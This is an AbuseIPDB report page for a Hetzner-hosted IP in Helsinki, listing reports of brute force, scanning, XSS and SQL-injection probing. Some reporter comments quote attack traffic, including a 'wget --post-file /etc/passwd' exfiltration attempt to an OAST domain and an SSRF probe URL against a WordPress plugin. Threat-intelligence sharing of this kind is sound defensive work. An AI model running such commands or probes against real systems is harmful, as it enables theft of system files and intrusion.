JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 65.21.51.234

65.21.51.234 was found in our database!

This IP was reported 37 times. Confidence of Abuse is 0%: ?

ISP	Hetzner Online GmbH
Usage Type	Data Center/Web Hosting/Transit
ASN	AS24940
Hostname(s)	static.234.51.21.65.clients.your-server.de
Domain Name	hetzner.com
Country	🇫🇮 Finland
City	Helsinki, Uusimaa

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 65.21.51.234

Whois 65.21.51.234

IP Abuse Reports for 65.21.51.234:

This IP address has been reported a total of 37 times from 28 distinct sources. 65.21.51.234 was first reported on April 4th 2026, and the most recent report was 1 month ago.

Old Reports: The most recent abuse report for this IP address is from 1 month ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇮🇳 evicky2002	2026-05-05 06:00:00 (1 month ago)	Confirmed malicious by STILWaters CTI platform (score=87, sources=1)	Hacking Brute-Force SSH
🇮🇱 spd.co.il	2026-04-17 14:03:46 (2 months ago)	Web application attack detected	Hacking Web App Attack
🇧🇪 cmbplf	2026-04-16 21:04:24 (2 months ago)	1485 limiting connections by zone (1h39m59s)	DDoS Attack
🇩🇪 NetNinja	2026-04-16 10:32:00 (2 months ago)	Massive hacking attempts	Web App Attack Hacking
🇵🇱 Ma ma	2026-04-15 15:30:00 (2 months ago)	page scanning	Web App Attack
🇫🇷 masterguru	2026-04-15 06:07:20 (2 months ago)	404 flood: more than 50 hits in 1 hour. Operator GE matched 50 at IP:block_404. (780530-133)	Hacking
🇪🇸 el-brujo	2026-04-15 01:46:25 (2 months ago)	Cloudflare WAF: Request Path: /zm/ Request Query: ?view=log Host: foro.elhacker.net userAgent: Mozil ... show more Cloudflare WAF: Request Path: /zm/ Request Query: ?view=log Host: foro.elhacker.net userAgent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_2; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18 Action: block Source: ratelimit ASN Description: HETZNER-AS Country: FI Method: GET Timestamp: 2026-04-15T01:46:25Z ruleId: 11a71ad4659e48b29b5173e3bcc61b4a. Report generated by Cloudflare-WAF-to-AbuseIPDB (https://github.com/MHG-LAB/Cloudflare-WAF-to-AbuseIPDB). show less	Hacking SQL Injection Web App Attack
🇪🇸 el-brujo	2026-04-15 01:44:21 (2 months ago)	[Wed Apr 15 03:44:20.229964 2026] [proxy_fcgi:error] [pid 3887200:tid 3887673] [remote 65.21.51.234: ... show more [Wed Apr 15 03:44:20.229964 2026] [proxy_fcgi:error] [pid 3887200:tid 3887673] [remote 65.21.51.234:0] AH01071: Got error 'Primary script unknown\n' [Wed Apr 15 03:44:20.596870 2026] [proxy_fcgi:error] [pid 3887199:tid 3887750] [remote 65.21.51.234:0] AH01071: Got error 'Primary script unknown\n' ... show less	Hacking Web App Attack
🇸🇬 Cloudkul Cloudkul	2026-04-15 01:35:24 (2 months ago)	Attempted Brute Force on our application	Brute-Force Web App Attack
Anonymous	2026-04-15 01:20:00 (2 months ago)	Extensive Cross-Site Scripting (XSS) Probing	Brute-Force Exploited Host Web App Attack Hacking SQL Injection
Anonymous	2026-04-15 01:19:00 (2 months ago)	Multiple attempts were made to execute wget --post-file /etc/passwd to exfiltrate the /etc/passwd fi ... show more Multiple attempts were made to execute wget --post-file /etc/passwd to exfiltrate the /etc/passwd file to an external OAST domain (d7f8h4hf445j4v50o0og59iakow78ncid.oast.pro) show less	Web App Attack Hacking SQL Injection
Anonymous	2026-04-15 01:18:00 (2 months ago)	This IP conducted extensive scanning for sensitive files (database backups, configuration files, SSH ... show more This IP conducted extensive scanning for sensitive files (database backups, configuration files, SSH keys, application binaries like .war, .jar) and common web application management/setup interfaces (e.g., /manager/html, /admin, /setup) show less	Web App Attack Hacking SQL Injection
🇫🇷 dynamix	2026-04-14 19:41:24 (2 months ago)	Multiple WAF Violations	Web App Attack
🇺🇸 ChamberofCommerce.com	2026-04-14 15:43:55 (2 months ago)	Unauthorized Scraping Attempt - More then 225 Pages Requested in a 24 hour period - Total Requested ... show more Unauthorized Scraping Attempt - More then 225 Pages Requested in a 24 hour period - Total Requested Before Block:227 show less	Bad Web Bot
🇺🇸 Gabriel Camargo	2026-04-13 19:04:18 (2 months ago)	65.21.51.234 - - [13/Apr/2026:14:04:17 -0500] "GET /wp-content/plugins/bj-lazy-load/thumb.php?src=ht ... show more 65.21.51.234 - - [13/Apr/2026:14:04:17 -0500] "GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http://d7ejsc1f445id4vrm7agkuaueth87rhhp.oast.pro/SiV2sNSq8r9GRsLm.jpg HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 65.21.51.234 - - [13/Apr/2026:14:04:17 -0500] "GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http://img.youtube.com/myRbvjdmzXgikf8o.jpg HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" ... show less	Brute-Force SSH

Showing 1 to 15 of 37 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇭🇰 144.48.8.10

🇨🇳 122.224.205.42

🇹🇭 119.59.116.141

🇭🇰 112.120.171.95

🇨🇳 58.240.17.66

🇧🇷 43.164.194.33

🇬🇧 35.203.210.65

🇻🇳 27.79.3.38

🇨🇳 27.8.44.168

🇺🇸 23.234.76.111

🇨🇳 157.0.147.159

🇹🇼 123.58.205.100

🇻🇳 113.182.79.225

🇦🇷 45.177.200.246

🇻🇳 14.247.194.62

🇧🇷 167.249.227.120

🇺🇸 162.217.103.68

🇹🇭 159.192.144.204

🇺🇸 67.212.45.27

🇷🇺 46.242.12.74